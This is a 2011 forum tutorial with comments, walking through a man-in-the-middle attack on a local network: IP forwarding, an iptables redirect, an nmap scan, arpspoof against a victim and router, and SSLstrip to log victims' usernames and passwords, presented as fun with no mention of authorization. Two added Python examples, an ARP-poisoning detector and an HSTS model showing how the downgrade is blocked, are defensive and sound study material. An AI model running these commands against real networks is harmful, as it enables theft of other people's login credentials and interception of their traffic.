Perform a Man In The Middle Attack Using Arpspoof and SSLstrip [Published]

edited July 2011 in Tech & Games
SSLstrip is a tool which you can use when you're performing MITM (Man In The Middle) attacks. It's very fun to use and can often produce some very interesting results, especially when combined with other tools such as Driftnet, MSGsnarf or URLsnarf! These particular tools can uncover things such as URLs which the victim is clicking on, images from the website which the victim is currently surfing (which you can actually save onto your own PC) and even real-time chats on Instant Messaging software like IRC. SSLstrip allows you to capture login information such as usernames and passwords.

For this guide, you will need a computer with arpspoof and SSLstrip installed, as well as nmap for finding your target's IP address. I recommend downloading Backtrack as it comes with all these tools out of the box.

How to Enable IP Forwarding

Enabling IP forwarding allows packets to pass through your machine. You need this to happen so that you can get in the middle of the victim's machine and the router, hence the name "Man in the Middle". To enable IP forwarding, type this into a terminal;
echo 1 > /proc/sys/net/ipv4/ip_forward

How to Configure your IPtables for ARP Spoofing

Get your terminal up on the screen and type in the following;
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

As you can probably tell, this will forward outgoing traffic on port 80 from the victim's machine to your machine, which is going to be running SSLstrip on port 8080.

Finding Your Target's IP address

Open a terminal and do a ping scan of the network, by issuing a command such as;
nmap -sP 192.168.0.1-255

Find the machine which you want to do a MITM attack on and copy down its IP address somewhere. That's all we need to do for this step, so move on!

How to use Arpspoof


Arpspoofing allows you to redirect packets from the victim's computer, straight to your machine. You then pass the packets along to the router as normal, meaning that the victim won't even know it's happening. After you capture traffic, SSLstrip will modify it before IPtables sends it away again. Fire up a new terminal and type in the following;
arpspoof -i wlan0 -t 192.168.0.5 192.168.0.1

The -i flag determines the interface used, and the -t flag is your target IP address. The second IP address is that of the router. Once you hit enter, you should start to see incoming traffic from the victim, which is then forwarded to the router.

How to use SSLstrip to Capture Login Credentials


Open another terminal. Navigate to /pentest/web/sslstrip and run SSLstrip by typing the following command;
python ./sslstrip.py -k -l 8080 -w /root/Desktop/sslstrip.log

This will start SSLstrip, listening on port 8080. The -w flag allows you to write your results to a file. The -k flag also kills all current sessions, forcing the client to log into websites again. Feel free to remove this flag if that's not something you want to do.

If you open another terminal window/tab and type "tail -F /root/Desktop/sslstrip.log", you will get real-time updates as the log file is written to. When a user logs into a website, their login credentials will be displayed in the file, like this!


Re-ARPing

Hit CTRL+C to kill your ARP spoofing, your SSLstrip and anything else you've got going on. This has a very high chance of putting the whole network offline for a second, which is the only downside to ARP spoofing. However, it shouldn't be a problem as everything will right itself quickly!

Enjoy.
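The defender's view of the arpspoof step, as an added example that is not part of the post above: a script that reads a Linux ARP table in /proc/net/arp format, compares it against a trusted baseline, and raises alerts for the two symptoms arpspoof leaves behind, a gateway whose MAC address has changed and one MAC address answering for several IPs. The gateway address is the post's 192.168.0.1; every MAC address and table row is constructed for the example.

```python
"""Detecting the ARP poisoning step from the defender's side.

Added example, not part of the forum post. It reads a Linux ARP table in
/proc/net/arp format, compares it against a trusted baseline, and raises
alerts for the two symptoms arpspoof causes: the gateway's MAC changing,
and a single MAC answering for more than one IP. The gateway address is
the post's 192.168.0.1; every MAC address and table row below is constructed.
"""
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"

# Constructed baseline captured on a quiet day (e.g. from DHCP leases or a
# signed inventory); keys are IPs, values are the MACs they should have.
BASELINE = {
    "192.168.0.1": "00:11:22:33:44:01",  # router
    "192.168.0.5": "00:11:22:33:44:05",  # workstation
    "192.168.0.9": "00:11:22:33:44:09",  # another host on the LAN
}

# Constructed /proc/net/arp snapshot taken while the poisoning is active:
# the router and the workstation now both resolve to 00:11:22:33:44:09.
POISONED_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.1      0x1         0x2         00:11:22:33:44:09     *        wlan0
192.168.0.5      0x1         0x2         00:11:22:33:44:09     *        wlan0
192.168.0.9      0x1         0x2         00:11:22:33:44:09     *        wlan0
192.168.0.77     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""


def parse_proc_arp(text):
    """Return [(ip, mac), ...] from /proc/net/arp text.

    The header row is skipped, as are incomplete entries (Flags 0x0),
    whose all-zero HW address carries no information.
    """
    entries = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3].lower()
        if int(flags, 16) == 0:
            continue
        entries.append((ip, mac))
    return entries


def analyze_arp(entries, baseline, gateway_ip=GATEWAY_IP):
    """Compare observed (ip, mac) pairs with the baseline; return alert strings."""
    alerts = []
    ips_per_mac = defaultdict(set)
    for ip, mac in entries:
        ips_per_mac[mac].add(ip)
        expected = baseline.get(ip)
        if expected is not None and expected.lower() != mac:
            level = "CRITICAL" if ip == gateway_ip else "WARNING"
            alerts.append(f"{level}: {ip} moved from {expected} to {mac}")
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append(f"WARNING: {mac} answers for {len(ips)} IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in analyze_arp(parse_proc_arp(POISONED_ARP_TABLE), BASELINE):
        print(alert)
```

Run against a live box by feeding it the contents of /proc/net/arp on a timer; a gateway entry that flips MAC address mid-session is the highest-value alert, because it is exactly what the arpspoof command in the post produces on every host it targets. Static ARP entries for the gateway, or dynamic ARP inspection on a managed switch, stop the poisoning itself rather than merely detecting it.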
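The mitigation for the SSLstrip step, as an added example that comes neither from the post nor from the SSLstrip project: a minimal model of the HTTP Strict Transport Security client behaviour defined in RFC 6797. Once a browser has received a Strict-Transport-Security header from a host over HTTPS, it rewrites every http:// URL for that host (and, with includeSubDomains, its subdomains) to https:// before sending anything, so links that a stripping proxy rewrote to http:// never leave the client in plaintext. Host names, header values and clock values are constructed; the third URL in the demo is a host the client has never visited, which is the first-visit gap that browser preload lists exist to close.

```python
"""Why HSTS defeats the HTTPS-to-HTTP downgrade described in the post.

Added example, not the forum post's or the SSLstrip project's code. It
models the client side of RFC 6797: a browser caches Strict-Transport-
Security policies received over HTTPS and upgrades any http:// URL for a
known host to https:// before a request is sent. Hosts (bank.example,
shop.example) and clock values are constructed.
"""
from urllib.parse import urlsplit, urlunsplit


def parse_hsts(header_value):
    """Parse an STS header value into (max_age, include_subdomains).

    Returns None when there is no usable max-age directive.
    """
    max_age = None
    include_sub = False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(value.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            include_sub = True
    if max_age is None or max_age < 0:
        return None
    return max_age, include_sub


class HstsCache:
    """The browser's per-host memory of 'only ever talk to me over TLS'."""

    def __init__(self):
        self.policies = {}  # host -> (expires_at, include_subdomains)

    def record(self, host, header_value, now):
        """Store a policy seen over HTTPS; max-age=0 removes the host."""
        parsed = parse_hsts(header_value)
        if parsed is None:
            return False
        max_age, include_sub = parsed
        if max_age == 0:
            self.policies.pop(host.lower(), None)
        else:
            self.policies[host.lower()] = (now + max_age, include_sub)
        return True

    def is_known(self, host, now):
        """True if host, or a parent domain with includeSubDomains, has a live policy."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            policy = self.policies.get(".".join(labels[i:]))
            if policy is None:
                continue
            expires_at, include_sub = policy
            if expires_at <= now:
                continue
            if i == 0 or include_sub:
                return True
        return False

    def upgrade(self, url, now):
        """Rewrite http:// to https:// for known hosts; explicit :80 becomes the default 443."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not parts.hostname:
            return url
        if not self.is_known(parts.hostname, now):
            return url
        netloc = parts.hostname
        if parts.port and parts.port != 80:
            netloc = f"{netloc}:{parts.port}"
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


def downgraded_links_after_hsts():
    """Constructed scenario: one earlier HTTPS visit, then three stripped links."""
    cache = HstsCache()
    t0 = 1_700_000_000  # constructed clock value
    cache.record("bank.example", "max-age=31536000; includeSubDomains", t0)
    # Links as a stripping proxy would hand them to the browser: all http://.
    stripped = [
        "http://bank.example/login",
        "http://www.bank.example/account",
        "http://shop.example/cart",  # never visited over HTTPS: no policy, stays http
    ]
    return [cache.upgrade(u, t0 + 60) for u in stripped]


if __name__ == "__main__":
    for url in downgraded_links_after_hsts():
        print(url)
```

The first two URLs go out as https:// regardless of what the proxy rewrote, which is why a site that sets a long max-age with includeSubDomains (and ideally appears in the browser preload list) is not susceptible to the credential capture shown in the post; the third URL shows that a host the browser has never seen the header from is still exposed on first contact.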

Comments

  • Slartibartfast (Global Moderator)
    edited July 2011
    Great guide.

    ARP is a protocol that determines what IP is assigned to which MAC address. Every NIC on your network (and the world) has a unique number, usually expressed in hexadecimal; this is called a MAC address.
    By using the ARP spoofing tool, you are tricking the victim's machine into thinking that your computer is the gateway (generally the router/switch).

    By enabling IP forwarding you are allowing requests sent by the victim to be processed by the real gateway even though they go through your machine, making you the "man in the middle".

    On some networks 192.168.0.1 may not be the gateway IP. On my network it's 10.1.1.1, so you may need to replace this with your gateway IP.
  • RemadE (Global Moderator)
    edited July 2011
    Better than porn. Love it :thumbsup:
  • edited July 2011
    Thanks for the clarifications Slart. The wonderful thing about using SSLstrip is that unlike with tools such as Ettercap, the victim bypasses SSL altogether. He unknowingly uses HTTP for everything, which is a plaintext protocol, allowing the Man In The Middle to capture things straight up.